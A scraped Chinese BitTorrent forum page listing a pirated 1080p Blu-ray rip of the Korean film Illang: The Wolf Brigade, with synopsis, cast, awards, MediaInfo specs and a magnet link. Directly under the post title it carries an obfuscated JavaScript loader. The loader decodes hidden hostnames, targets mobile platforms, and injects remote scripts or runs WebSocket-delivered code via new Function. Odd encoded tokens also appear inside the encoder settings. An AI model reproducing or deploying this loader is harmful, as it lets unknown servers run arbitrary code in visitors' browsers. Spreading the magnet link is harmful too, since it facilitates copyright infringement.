人狼[中文字幕].Illang.The.Wolf.Brigade.2018.1080p.BluRay.x264.DTS-迅雷下载 13.44GB

版主小s 29天前 607

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

image.png

◎译 名 人狼 / Illang: The Wolf Brigade / Inrang

◎片 名 ??

◎年 代 2018

◎产 地 韩国

◎类 别 动作 / 爱情 / 科幻

◎语 言 韩语

◎上映日期 2018-07-25(韩国)

◎IMDb评分 6.0/10 from 4301 users

◎IMDb链接 https://www.imdb.com/title/tt3967878

◎豆瓣评分 5.3/10 from 4977 users

◎豆瓣链接 https://movie.douban.com/subject/20442984/

◎片 长 138分钟

◎导 演 金知云 Jee-woon Kim

◎编 剧 金知云 Jee-woon Kim / 押井守 Mamoru Oshii

◎主 演 姜栋元 Dong-won Kang

韩孝周 Hyo-joo Han

郑雨盛 Woo-sung Jung

金武烈 Moo-yeol Kim

韩艺璃 Ye-ri Han

许峻豪 Jun-ho Heo

崔珉豪 Min-ho Choi

申银秀 Eun-Soo Shin

崔镇浩 Jin-ho Choi

玉子妍 Ja-yeon Ok

李济延 Lee Je-yeon

李东河 Lee Dong-Ha

李率求 Seol-goo Lee

沈昭英 So-yeong Sim

郑元中 Won-jung Jeong

金宰荣 Jae-young Kim

刘尚宰 Sang-jae Yoo

郑基燮 Gi-seop Jeong

刘志龙 Ji-yong Yoo

金范来 Kim Beop-rae

金哲允 Cheol-yoon Kim

林智亨 Ji-hyeong Im

朴秉恩 Byung-eun Park

文艺媛 Ye-won Moon

全汝彬 Jeon Yeo-bin

张元亨 Jang Won-hyeong

洪仁 Hong In

朴晟泽 Song-tech Park

金炫俊 Kim Hyun-jun

文在元 Jae-won Moon

姜贤重 Hyun-joong Kang

朴正植 Jeong-sik Park

郑米楠 Mi-nam Jung

朴亨洙 Hyoung-soo Park

林哲亨 Lim Chul-hyung

朴珠熙 Joo-hee Park

金贤昌 Kim Hyeon-chang

全振序 Jin-seo Jun

宋智贤 Ji-hyeon Song

Jeong-hee Heo

洪承逸 Seung-il Hong

杨道贤 Do-hyeon Yang

郑美南 Mi-nam Jeong

申载敏 Jae-min Sin

全光镇 Kwang-jin Jeon

Ma-ro Choi

申成日 Sung-il Shin

白承益 Seung-ik Baek

李东熙 Dong-hee Lee

赵云 Jo Won

Ee-geon Kim

金文学 Moon-hak Kim

Hyeok-beom Kwon

崔昌均 Chang-gyoon Choi

Jae-han Park

Hwak-gwang Lee

文珠妍 Ju-yeon Moon

郑亨奭 Hyeong-Seok Jeong

金其范 Kim Gi-beom

金艺恩 Ye-eun Kim

◎标 签 韩国 | 动作 | 科幻 | 2018 | 政治 | 动画改编 | 战争 | 剧情

◎简 介

2024年,朝鲜半岛局势发生重大变化。为了抵制美、俄、中、日四国的压力,朝鲜与韩国决定统一。然而,韩国国内反对统一的呼声甚嚣尘上,怀有不同政治目的的“党派”则在乱象中起到推波助澜的作用。为此,韩国政府组建了全新的警察组织特殊机动队以镇压动乱,结果导致了果川走火事件。从此以后,特殊机动队遭到民众乃至部分政客的憎恶,而公安部更试图伺机解散特殊部队。2029年,在最近一次行动中受伤的特殊部队成员林钟景(姜栋元 饰),在昔日战友而今成为公安部干部韩尚宇(金武烈 饰)的安排下,与果川事件遇害女孩的姐姐李允熙(韩孝周 饰)会面。谁知,这却是一场攸关林钟景以及整个特殊部队命运的圈套……本片根据押井守的同名动画改编。

◎获奖情况

第39届韩国电影青龙奖(2018)

最佳摄影(提名)

最佳美术(提名)

第66届圣塞巴斯蒂安国际电影节(2018)

金贝壳奖(提名) 金知云

第55届韩国电影大钟奖(2018)

最佳美术(提名)

最佳服装

最佳技术奖(提名)

最佳照明(提名)

  1. General

  2. Unique ID : 49806031262545890510630953639004431618 (0x25784AEE840BF4BFFAA01BF045116502)

  3. Complete name : Illang.The.Wolf.Brigade.2018.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.4 GiB

  7. Duration : 2 h 17 min

  8. Overall bit rate : 14.0 Mb/s

  9. Movie name : Illang The Wolf Brigade 2018

  10. Encoded date : UTC 2021-07-04 05:19:56

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 2 h 17 min

  25. Bit rate : 12.4 Mb/s

  26. Width : 1 920 pixels

  27. Height : 808 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.334

  36. Stream size : 12.0 GiB (89%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 2 h 17 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1.45 GiB (11%)

  57. Language : Korean

  58. Default : Yes

  59. Forced : No


  60. Text #1

  61. ID : 3

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 2 h 17 min

  67. Bit rate : 13.1 kb/s

  68. Count of elements : 1486

  69. Stream size : 12.9 MiB (0%)

  70. Title : chs

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 2 h 17 min

  81. Bit rate : 13.3 kb/s

  82. Count of elements : 1486

  83. Stream size : 13.1 MiB (0%)

  84. Title : cht

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 2 h 16 min

  95. Bit rate : 11.5 kb/s

  96. Count of elements : 1732

  97. Stream size : 11.3 MiB (0%)

  98. Language : Korean

  99. Default : No

  100. Forced : No


  101. Text #4

  102. ID : 6

  103. Format : PGS

  104. Muxing mode : zlib

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 2 h 16 min

  108. Bit rate : 14.7 kb/s

  109. Count of elements : 1714

  110. Stream size : 14.4 MiB (0%)

  111. Language : English

  112. Default : No

  113. Forced : No


  114. Menu

  115. 00:00:00.000 : Chapter 01

  116. 00:04:38.862 : Chapter 02

  117. 00:12:22.450 : Chapter 03

  118. 00:19:59.990 : Chapter 04

  119. 00:29:57.337 : Chapter 05

  120. 00:42:00.768 : Chapter 06

  121. 00:49:41.854 : Chapter 07

  122. 01:00:38.677 : Chapter 08

  123. 01:09:38.925 : Chapter 09

  124. 01:20:42.463 : Chapter 10

  125. 01:33:28.436 : Chapter 11

  126. 01:44:21.714 : Chapter 12

  127. 01:55:53.155 : Chapter 13

  128. 02:04:12.737 : Chapter 14

  129. 02:09:53.661 : Chapter 15

  130. 02:14:41.031 : Chapter 16



TAGS 动作 科幻 爱情

磁力链:
  • magnet:?xt=urn:btih:2D7B8A5B986902B17421C70782848B9FE6A5F174
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回